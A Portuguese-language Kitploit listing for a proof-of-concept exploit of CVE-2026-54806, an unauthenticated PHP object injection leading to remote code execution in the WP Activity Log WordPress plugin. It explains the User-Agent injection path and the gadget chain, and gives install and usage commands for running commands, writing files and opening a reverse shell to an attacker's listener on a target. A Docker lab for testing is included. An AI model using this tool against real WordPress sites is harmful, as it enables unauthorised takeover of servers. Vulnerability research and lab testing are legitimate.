Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-54806 — Injeção de Objeto PHP não autenticada para RCE no WP Activity Log <= 5.6.3.1 (CVE-2026-54806) | Kitploit
Ferramentas/GitHubGitHub/joshuavanderpoll/cve-2026-54806
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de PayloadsLabs e Prática
GitHubjoshuavanderpoll/cve-2026-54806

CVE-2026-54806

Injeção de Objeto PHP não autenticada para RCE no WP Activity Log <= 5.6.3.1 (CVE-2026-54806)

Ver Repositório
54há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

WP Activity Log Injeção de Objeto PHP (CVE-2026-54806) PoC

Python

📜 Descrição

CVE-2026-54806 é uma vulnerabilidade crítica (CVSS 9.8) de injeção de objeto PHP não autenticada no plugin WordPress WP Activity Log (wp-security-audit-log) da Melapress. Um atacante não autenticado pode injetar objetos PHP serializados através do cabeçalho User-Agent em qualquer requisição que dispare um evento registrado (ex.: uma tentativa de login mal-sucedida). O payload injetado é armazenado no banco de dados e desserializado sem restrições quando um administrador visita o painel do WordPress, levando à execução remota de código cega (nenhuma saída é retornada ao atacante).

Plugin afetado: WP Activity Log <= 5.6.3.1 (corrigido na versão 5.6.4)

Requerido para RCE: WordPress 6.4.0 - 6.4.1 — este PoC usa o gadget WP_HTML_Token, a única cadeia do núcleo do WP com todas as propriedades públicas que sobrevive ao sanitize_text_field() e se encaixa no limite de coluna de 255 caracteres.

✨ Funcionalidades

  • Verificação de vulnerabilidade — Detecção não destrutiva via --check
  • Execução de comandos — Injetar comandos via --command
  • Reverse shell — Injetar reverse shell via --shell
  • Escrita de arquivo — Escrever arquivos via --write-file
  • Nenhuma autenticação necessária — Payload injetado via User-Agent de login mal-sucedido
  • RCE cega — Nenhuma saída de comando retornada; use reverse shell ou escrita de arquivo para interação

🛠️ Instalação

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ Uso

root@kitploit:~
python3 cve-2026-54806.py -t <target> --check
python3 cve-2026-54806.py -t <target> --command <cmd>
python3 cve-2026-54806.py -t <target> --shell --lhost <ip> --lport <port>
python3 cve-2026-54806.py -t <target> --write-file <content> <path>

🐋 PoC Docker

Laboratório auto-contido com WordPress 6.4.1 + WP Activity Log 5.6.3.1. Verifique DOCKER.md para detalhes.

root@kitploit:~
cd docker
docker compose up -d
python3 cve-2026-54806.py -t http://localhost:8080 --check

O laboratório inclui um admin-bot que visita o painel a cada 60 segundos, de modo que os payloads injetados disparam automaticamente — nenhuma interação manual necessária.

🕵🏼 Referências

  • WP Activity Log — Melapress
  • NVD — CVE-2026-54806
  • Patchstack — CVE-2026-54806

📢 Aviso

Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa. O criador não assume nenhuma responsabilidade por qualquer uso indevido ou danos causados por esta ferramenta.

Baixar ferramenta